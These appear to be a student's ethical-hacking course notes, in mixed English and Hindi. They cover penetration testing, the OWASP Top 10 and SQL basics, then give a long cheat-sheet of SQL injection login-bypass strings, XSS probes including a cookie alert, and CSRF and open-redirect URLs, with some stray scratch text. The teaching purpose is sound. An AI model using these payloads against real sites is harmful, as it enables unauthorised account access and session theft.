daLbKfJr

1
2VAPT
3Vulnerabitinglity Assessment Penetration Testing
4VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert,
5
6so VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans and tries to find out the security gaps or holes that make the device or software vulnerable
7			 
8Example 
9ip address	-> 192.168.1.55
10open ports(ports on which some application may be listening)
11Filtered ports-(Firewall protected)
12os information -is it upto date?
13Service running on ports
14
15
16PENETRATION TESTING is a phase in which the intended person actually tests out the systems by simulating attacks on the systems
17
18Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker.The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.
19
20Example using Exploits for known vulnerability
21
22->windows 7 Server 
23
24->Using exploit to exploit the server
25
26AT the end a proof of concept is need to be made a handed to Senior Authority
27
28Example
29Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and they pay large sums of money to them to do that in the end of VAPT a Vapt report needs to be handed to the bank's security team 
30
31
32__________________________________________________
33
34
35
36Owasp ->Open Web Application Security Project
37
38Owasp top 10
39
401. Injection 
412. Broken Authentication and Session Management
423. Cross Site Scripting(XSS)
434. Insecure Direct Object Reference
445. Security Misconfiguration
456. Sensitive Data Exposure
467. Missing Function Level Access Control
478. Cross site request forgery
489. Using Known Vulnerable Components
4910.Unvalidated Redirects and Forwards
50
51
52
531. Injection Vulnerabilities--> Sql,Commands
54
55Injection Attack occurs only if hacker's are able to send malicious unintended data from an application to the interpreter or say backend of the website .
56
57application->untrusted data->interpreter(backend)
58
59why this attacks occurs ->>
60This attack occurs because of improper validation-> for e.g lets take the example of a signin or signup field on a computer web application ,now when a user is trying to sign-in or sign-up
61it requires user to enter id/password in a certain manner, like there should be no special characters involved etc, You will learn about that as regular expressions
62
63Similarly when a developer is setting up a webapp/or application he/she need to validate all the parameter,link and domains of the website so that commands or special character dont work.
64__________________________________________________________________
652. Broken Authentication and Session Management
66
67In broken authentication or session management hackers make an attempt to steal account from another users, Attackers/hacker uses leaks and flaws in the authentication or session management Functions.
68
69Why this attack occurs....
70
71->User credentials are not protected when stored using hashing or encryption
72-
73>Credentials can be guessed or overwritten through weak management functions eg(Hacker is able to guess session id , or change password)
74
75->Session id's are exposed in the url
76->Session id's don't time out
77______________________________________________________________________
78
793. Cross Site Scripting (XSS)
80
81It is an attack in which hackers are able to execute javascript code on a web site, It is of three types 
82
83->XSS Reflected 
84
85->XSS Stored 
86
87->Dom XSS
88
89This attack can be used by hacker to execute javascript code in victim browser to hijack user sessions, deface website, insert content, etc
90
91Why this attack occurs
92
93->Improper Validation
94->Unsafe JavaScript API
95
96The pentesting of a website can easily protect form xss attacks and xss can also be found with simple code analysis.
97_______________________________________________________________________________
98
994. Insecure Direct Object Reference
100
101
102It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account by changing his/her own object reference assigned by the app. 
103
104study tonight
105
1065.Security Misconfiguration
107
108As the name is security misconfiguration what it means is imagine a webapp having admin accounts on it or just having default accounts with default passwords but having certain privleges . Now if you run a website which has default accounts configured and your website is available in the public domain. Now from an attackers perspective he/she can actually go out and try out default credentials and would be able to log in the website.
109
110why this attack occurs->
111
112->Keeping default credentials
113->Using a component or plugin which may have some default credentials
114e.g
115->>>>>>>>>>>Directory listing is not disabled on your server.
116
117Attacker discovers she can simply list directories to find any
118file. Attacker finds and downloads all your compiled Java
119classes, which she decompiles and reverse engineers to get all
120your custom code. She then finds a serious access control
121flaw in your application
122_______________________________________________________________________
123
1246.Sensitive Data Exposure
125Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
126
127
128eg 1
129An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
130
131eg 2
132A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
133traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
134
135
136_____________________________________________________________________________
1377. Missing Function Level Access Control
138->It is an attack in which a hacker or an anonymous person is able able to access an application interface that it would otherwise never been able to access.
139
140eg www.anywebsite.com/user
141
142and hacker is able to access www.anywebsite.com/admin
143now if a hacker /person is able to do that it is a flaw.
144____________________________________________________________
145
1468. Cross site request Forgery.
147In this attack the hacker creates a forged http request and tricks victim into submitting that request via images tabs or xss
148
149
150
151The application allows a user to submit a state changing request that does not include anything secret.
152For example:
153 http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
154this all done by making the victim click on a link or on a certain appealing image 
155_______________________________________________________________
156
157
158
1599. Using Components with Known Vulnerability
160In this case hacker tries to discover a weak component through scanning or manual analysis and then either finds out an exploit if already available or writes an exploit
161
162eg 
163a website using a server which has an rce exploit 
164or
165a wordpress website which has a vulnerable component and has an exploit.
166___________________________________________________________________________________
167
16810.Unvalidated Redirects and Forwards
169Attacker links to unvalidated redirects and tricks victim into clicking it,attacker targets unsafe forwards to bypass security check.
170
171eg  http://anywebsite.com/redirect.jsp?url=evil.com
172
173->->url=evil.com<-<-
174
175______________________________________________________________________________________
176Introduction to DBMS
177Database
178
179Database is a collection of structured data set which contains all the data(important credentials,logs,etc)
180Database Management system-This data needs to be managed and it is done with help of dbms ,Dbms can also interact with user and writes user data to database.
181
182Database can be of two types 
183SQL 
184No SQL
185There are certain tables and entries in a database
186
187table name Member
188_________________________________________________________
189Name | ID | NUMBER |		 EMAIL 		| ADDRESS | Age |
190_________________________________________________________
191deepak|10|9123456719|deepak@yahoo.co.in|lokhandvala|26 |
192Gagan |4 |9145619237|gagan@gmail.com   |Delhi      |20 |   
193_________________________________________________________
194
195
196Structured querries would look like
197for example
198all the people who have age less then 30
199so query would look like
200
201Select * from Member where age<30
202
203
204h.w perform all querries
205queries
206 SELECT - extracts data from a database
207= UPDATE - updates data in a database
208= DELETE - deletes data from a database
209= INSERT INTO - inserts new data into a database
210= CREATE DATABASE - creates a new database
211= ALTER DATABASE - modifies a database
212= CREATE TABLE - creates a new table
213= ALTER TABLE - modifies a table
214= DROP TABLE - deletes a table
215= SELECT * from trainees -  Select everything from table name "trainees"
216= WHERE - Showing the location of the data of the table,column etc.
217
218H.w Study Mongodb
219sql VS noSql
220
221_________________________________
222LVS Setup configuration Practical
223_________________________________
224
225______________________________________________
226Sql Injection Authentication Bypass
227
228at the time of authentication ho kya rha hen
229Lets Imagine
230koi querry hogi -> username== 'Something' && password=='Something'
231
232if ham querry ko true karwade kisi Tareeke se and dbms confuse hojay to kya vo hame login dega??
233
234for eg username = 1' or '1' = '1 
235	   password = 1' or '1' = '1
236
237	   or hum kya try kar sakte hen
238	   0' or '0' = '0
239	   2' or '2' = '2
240	   or
241	   0' or '3' = '3
242
243so basically you just need to manage to make querry true and if there is improper validation you can get access
244
245
246
247
248
249
250usernmamev =hello
251password   = hello1
252\
253login
254
255
256
2571' or '1' = '1
2581' or '1' = '1
259
260asljhdaksd??where some where username='1' or '1' = '1' & password ='1' or '1' = '1'lajbnd,fsnfkns.d
261
262
263
264
265
266
267
268
269___________________________________________
270or 1=1
271or 1=1--
272or 1=1#
273or 1=1/*
274admin' --
275admin' #
276admin'/*
277admin' or '1'='1
278admin' or '1'='1'--
279admin' or '1'='1'#
280admin' or '1'='1'/*
281admin'or 1=1 or ''='
282admin' or 1=1
283admin' or 1=1--
284admin' or 1=1#
285admin' or 1=1/*
286admin') or ('1'='1
287admin') or ('1'='1'--
288admin') or ('1'='1'#
289admin') or ('1'='1'/*
290admin') or '1'='1
291admin') or '1'='1'--
292admin') or '1'='1'#
293admin') or '1'='1'/*
2941234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
295admin" --
296admin" #
297admin"/*
298admin" or "1"="1
299admin" or "1"="1"--
300admin" or "1"="1"#
301admin" or "1"="1"/*
302admin"or 1=1 or ""="
303admin" or 1=1
304admin" or 1=1--
305admin" or 1=1#
306admin" or 1=1/*
307admin") or ("1"="1
308admin") or ("1"="1"--
309admin") or ("1"="1"#
310admin") or ("1"="1"/*
311admin") or "1"="1
312admin") or "1"="1"--
313admin") or "1"="1"#
314admin") or "1"="1"/*
3151234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
316
317
318
319
320
321
322----------------
323get method
324
325post method
326
327
328www.hisbank.com/transferfuntosunil's_account?amouunt=500000
329
330
331
332
333website.com
334
335username='something'
336password='something'
337 
338
339 login
340username='something'
341password='something'
342 
343
344 1' or '1' = '1
345
346jghvhjdajshdgsd where username='1' or '1' = '1' and password='1' or '1' = '1'e87
347
348
349
350
351
352
353
354
355
356
357
358
359<script>alert('hello Chai pilo Frands')</script>
360"><script>alert('hello Chai pilo Frands')</script>
361<ScRiPT>aler
362
363
364https://bugcrowd.com/programs/session=1257
365
366<script>alert(document.cookie)</script>
367
368
369
370
371
372bankwebsite.com/transferfunds=10000toattackeraccount=3762487216
373
374
375
376logic =admin' or '1' ='1
377
378username='1' = '1' and password='1' = '1'
379
380
381where username='12' or '3' ='3' and password='12' or '3' ='3'
382						1		*					1
383
384
3851' or '1' ='1
386
3871' or '1=1'
388
3891' = '1
390
391admin' or 'admin' ='admin
392
39312' or 'something'= 'something
394
395
396
397<scRiPt>